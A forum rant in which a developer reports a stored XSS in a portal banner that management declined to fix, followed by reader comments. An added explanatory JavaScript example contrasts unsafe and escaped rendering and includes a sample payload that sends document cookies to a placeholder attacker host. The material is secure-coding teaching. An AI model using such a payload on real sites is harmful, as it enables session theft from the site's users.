45

a stored XSS vuln in a banner-like component, visible on ALL the pages in the portal. Anyone can attack anyone.

HOWEVER, this was not discovered by the 3rd-party security specialists during the latest security audit. I escalated this to my manager and was told that unless the client actively requests this to be fixed, I should not do anything about it.

FFS... it's only 2 lines of code... And there's nothing I can do about it.

Eventually I was transferred to another project. Now it's not my problem anymore.
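The post does not show the component or the fix. The following is an added example (not the poster's code or the portal's) of the shape such a bug usually takes, assuming the banner text is a user-editable field stored server-side and interpolated into the markup of every page. The sample banner records, the `renderBannerUnsafe`/`renderBannerSafe` functions and the `containsMarkup` check are all constructed for illustration:

```javascript
// Added example: a shared banner component rendered on every page of a portal.
// Assumption (not from the post): the banner text is stored server-side from a
// user-editable field and injected into the page as HTML.

// Constructed sample of stored banner records, as a backend might return them.
const STORED_BANNERS = [
  { id: 1, text: "Maintenance window on Saturday 02:00-04:00" },
  // A malicious "banner" saved by anyone who can edit the field: stored XSS,
  // delivered to every visitor of every page that shows the banner.
  { id: 2, text: '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">' },
];

// Vulnerable: interpolates the stored text straight into markup, the string
// equivalent of `element.innerHTML = text`. The browser parses the payload.
function renderBannerUnsafe(text) {
  return `<div class="banner">${text}</div>`;
}

// The small fix assumed here: HTML-encode the five metacharacters before
// interpolation, so stored text is displayed as text and never parsed as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderBannerSafe(text) {
  return `<div class="banner">${escapeHtml(text)}</div>`;
}

// Check used only to show the difference: after stripping the wrapper div,
// does the rendered output still contain a raw tag opener from the stored text?
function containsMarkup(html) {
  const inner = html.replace(/^<div class="banner">/, "").replace(/<\/div>$/, "");
  return /<[a-z!\/]/i.test(inner);
}

// Render every stored banner with the given renderer.
function renderAll(renderer) {
  return STORED_BANNERS.map((b) => renderer(b.text));
}

// In a real browser component the equivalent fix is `element.textContent = text`,
// which never parses its argument as HTML at all.
if (typeof require !== "undefined" && require.main === module) {
  for (const html of renderAll(renderBannerUnsafe)) {
    console.log("unsafe  markup=" + containsMarkup(html) + "  " + html);
  }
  for (const html of renderAll(renderBannerSafe)) {
    console.log("safe    markup=" + containsMarkup(html) + "  " + html);
  }
}
```

Encoding at the point of output, as above, is the one place the fix has to live: it works regardless of what was stored, so it also neutralises payloads already sitting in the database, which input validation alone would not.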

Comments
  • 14
    2 lines of code?! Do you have to seek permission for every tiny code change like that?! If so that's madness. I would have just fixed it and notified management afterwards. If I got anything other than a positive response, it would have resulted in one heck of an argument.
  • 6
    @AlmondSauce Yepp, I have to get permission to push those 2 lines :) It's madness, I know...
  • 1
    @rooter Code reviews, sure. But they're generally about making sure the code committed is sensible, follows style guidelines etc. They're not a tool for management to use to decide what features or fixes should be worked on.
  • 1
    Regardless of the team you are on now, create the PR, leave it on them, cover your ass.